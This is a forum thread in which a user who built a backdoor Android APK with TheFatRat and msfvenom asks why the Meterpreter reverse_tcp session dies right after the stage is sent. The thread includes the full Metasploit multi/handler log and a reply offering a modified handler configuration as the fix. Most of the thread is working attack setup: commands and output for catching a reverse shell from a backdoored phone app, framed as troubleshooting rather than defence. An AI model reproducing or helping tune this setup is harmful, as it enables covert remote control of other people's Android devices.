Forum Thread: Meterpreter Session Stage Failing

Hello, I've recently downloaded Kali to try to learn some new cool stuff.

I came across the TheFatRat program on the net and I've downloaded it and generated a backdoor apk(tried both msfvenom and original apk-s)

And the problem I've kept getting for the past 2 days that i've been trying to make this work is the session just dies...the backdoor contacts the meterpreter and then the meterpreter sends the stage and that's it...no response from the device after that...it just sends the stage and then a minute or so later the connection dies.

Here's the log:

msf > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD android/meterpreter/reverse_tcp
PAYLOAD => android/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.0.11
LHOST => 192.168.0.11
msf exploit(handler) > set LPORT 4445
LPORT => 4445
msf exploit(handler) > exploit -j
* Exploit running as background job 0.

* Started reverse TCP handler on 192.168.0.11:4445
msf exploit(handler) > * Sending stage (69050 bytes) to 192.168.0.15
* Meterpreter session 1 opened (192.168.0.11:4445 -> 192.168.0.15:59194) at 2017-10-27 04:56:26 +0200
* 192.168.0.15 - Meterpreter session 1 closed. Reason: Died

I've tried switching to another IP address on both pc and phone and no luck.

The phone is running a custom rom Android 7.1.2, tried on another phone which has 5.0 android on it and same thing happens...I think the meterpreter might be the problem.

1 Response

Try this it's working
msf > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD android/meterpreter/reverse_tcp
PAYLOAD => android/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.0.11
LHOST => 192.168.0.11
msf exploit(handler) > set LPORT 4445
LPORT => 4445
msf exploit(handler) > set ExitOnsession true
msf exploit (handler)> exploit -j

Share Your Thoughts

  • Hot
  • Active